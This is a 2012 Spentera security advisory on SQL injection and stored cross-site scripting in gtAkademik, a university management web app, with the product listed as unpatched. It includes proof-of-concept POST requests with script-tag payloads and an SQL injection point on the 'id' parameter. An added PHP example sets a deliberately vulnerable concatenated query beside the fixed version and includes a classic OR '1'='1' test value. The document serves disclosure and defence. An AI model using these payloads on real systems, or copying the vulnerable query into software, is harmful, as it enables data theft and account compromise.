7/27/2019 SPN-01-2012
http://slidepdf.com/reader/full/spn-01-2012 1/6
Copyright © 2012. Spentera. All rights reserved. Page 1
http://www.spentera.com Version 1.3
Spentera – Security Advisory – SPN-01-2012
gtAkademik Gamatechno SQL Injection and Persistent Cross Site Scripting Vulnerability
February 20, 2012
gtAkademik Gamatechno – SQL Injection and Persistent Cross-site Scripting –
Security Advisory – SPN-01-2012

Release Date: Monday, February 20, 2012
Last Update: Tuesday, June 19, 2012
Vendor Notification Date: Friday, February 10, 2012
Product: gtAkademik Gamatechno
Platform: PHP
Affected Versions: Latest release (2011)
Tested on: Ubuntu 11.10, Apache 2.2.11, PHP 5.3.9
Risk Factor: High
Impact: Loss of integrity and confidentiality on server and client side.
Attack Vector: Attacker can retrieve data from the target database and plan a client-side attack using XSS by editing an existing user profile and injecting a JavaScript XSS shell.
Solution Status: Unpatched

Software Description

gtAkademik Academica is a web-based application that focuses on academic and administrative data management for university students, managing KRS activities, student grading management, curriculum and semester management, up to DIKTI reporting. gtAkademik also has features such as: Automation Reporting System for EPSBED DIKTI, Supports Curriculum Changes, Ease of management of Student Transcript, Virtual Class (eLearning), KRS and Online Coaching, and Reporting.
Vulnerability Details

Persistent XSS

The application allows an attacker to inject an XSS script into the database (stored XSS), because there is no sanitization process. Two modules suffer from XSS: the Message module and the Update Profile module.

SQL Injection

The application also suffers from an SQL injection vulnerability, again because there is no sanitization process. This allows an attacker to extract the contents of the database and find a lot of important data, for example the credentials stored inside the database.
Proof of Concept

Persistent XSS in Message Module

The Message module is used for internal messaging inside gtAkademik. We can send an XSS-crafted message to other users, for example to an administrator user.
POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169

data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX&data%5BMessageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3E&act=doCompose&compBtn=Kirim
Persistent XSS in User Profile Module (save the user profile)

This module is used when we want to update the profile. We can inject an XSS payload into the profile and then save it into the database, so everyone who tries to view our profile can be attacked using the XSS.
POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX&alamat=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan

SQL Injection in ‘id’ parameter

The parameter ‘id’ is vulnerable to SQL Injection.

http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204[INJECTED PARAMETER]
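The following is an added example written for this page; it is not code from gtAkademik, Gamatechno or Spentera. It shows the PHP pattern behind both findings next to the standard fix: the ‘id’ parameter validated and bound through a PDO prepared statement instead of being concatenated into the query, and the stored profile text (the alamat field of the request above; the Message module fields are handled the same way) HTML-encoded with htmlspecialchars at render time. The table names transaksi_registrasi and mahasiswa are assumptions, and the demonstration runs on an in-memory SQLite database so that it needs only PHP with the pdo_sqlite extension.

```php
<?php
// Added example (not gtAkademik/Gamatechno code): the two defect classes the
// advisory describes, each beside the usual PHP fix. Table and column names
// (transaksi_registrasi, mahasiswa) are assumptions; the request parameters
// 'id' and 'alamat' are the ones named in the advisory.
declare(strict_types=1);

// --- SQL injection in the 'id' parameter -----------------------------------

// Vulnerable pattern: the request value is pasted into the query text, so a
// value containing quote characters changes the query instead of the data.
function registrationDetailVulnerable(PDO $db, array $get): array
{
    $sql = "SELECT * FROM transaksi_registrasi WHERE id = '" . $get['id'] . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the value is checked against the shape the application expects (a
// decimal registration number) and then bound as a parameter, so the SQL text
// the database parses never contains attacker-controlled characters.
function registrationDetailFixed(PDO $db, array $get): array
{
    // is_string() guards against id[]=... arriving as an array
    if (!isset($get['id']) || !is_string($get['id']) || !ctype_digit($get['id'])) {
        return [];   // reject the value rather than trying to "clean" it
    }
    $stmt = $db->prepare('SELECT * FROM transaksi_registrasi WHERE id = :id');
    $stmt->execute([':id' => $get['id']]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Persistent XSS in message and profile fields --------------------------

// Storing: a prepared statement keeps the text out of the SQL, but it does NOT
// make the text safe to display; the stored value is still "<script>...".
function saveProfileAddress(PDO $db, int $userId, string $alamat): void
{
    $stmt = $db->prepare('UPDATE mahasiswa SET alamat = :alamat WHERE id = :id');
    $stmt->execute([':alamat' => $alamat, ':id' => $userId]);
}

// Rendering: encode for the HTML context at output time. ENT_QUOTES also
// encodes single quotes so the helper is safe inside quoted attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderProfileRow(array $row): string
{
    return '<tr><td>' . h($row['alamat']) . '</td></tr>';
}

// --- Demonstration on an in-memory SQLite database (constructed sample) -----
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE transaksi_registrasi (id INTEGER PRIMARY KEY, nama TEXT)');
$db->exec("INSERT INTO transaksi_registrasi VALUES (129000204, 'sample registrant')");
$db->exec('CREATE TABLE mahasiswa (id INTEGER PRIMARY KEY, alamat TEXT)');
$db->exec("INSERT INTO mahasiswa VALUES (1, '')");

// On a well-formed id both functions return the same row; the fixed one
// refuses a malformed id before any SQL is built.
var_dump(count(registrationDetailVulnerable($db, ['id' => '129000204'])));
var_dump(count(registrationDetailFixed($db, ['id' => '129000204'])));
var_dump(count(registrationDetailFixed($db, ['id' => "129000204' OR '1'='1"])));

// The profile payload from the advisory is stored verbatim and rendered inert.
saveProfileAddress($db, 1, '<script>alert("XSS");</script>');
$row = $db->query('SELECT alamat FROM mahasiswa WHERE id = 1')->fetch(PDO::FETCH_ASSOC);
echo renderProfileRow($row), PHP_EOL;
```

Run it with `php example.php`. The prepared statement alone does not address the XSS: the payload is stored unchanged, and the page stays safe only because every render path passes through h(). Encode for the output context rather than stripping tags on input, since the same stored value may later appear in an attribute, a JavaScript string or a JSON response, each needing a different encoding. On MySQL, add PDO::ATTR_EMULATE_PREPARES => false to the connection options so the server rather than the driver does the binding, and setting session.cookie_httponly=1 keeps the PHPSESSID cookie shown in the requests above out of reach of any script that does get injected.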
Solution

Unpatched

Discovered by

Mada R. Perdhana and Hanny Haliwela from Spentera Research.
About Us

Spentera is a limited liability security consulting company that focuses on penetration testing services, vulnerability discovery, and digital forensics. We have been providing satisfactory service to clients in Indonesia in particular, and the world at large. Our portfolio is proof that we are building this company seriously and paying attention to every quality that is given to the client. All services we provide are based on international standards and are used as primary standards in some countries like the United States, Japan, Germany, France, and the United Kingdom. Some of the clients that we handle include military, police, government, mining, oil and gas, and the private sector such as finance and banking.

Our security experts' seven years of experience is beyond doubt. Our good relationship with the client is the most important basis for the quality of service that we continue to improve.

Spentera Centerflix Boutique Office
Jl. Danau Toba no. 104, Bendungan Hilir.
Jakarta Pusat. 10210.
Jakarta. Indonesia.
T: +62 (21) 5701505 F: +62 (21) 5738105
W: http://www.spentera.com E: [email protected]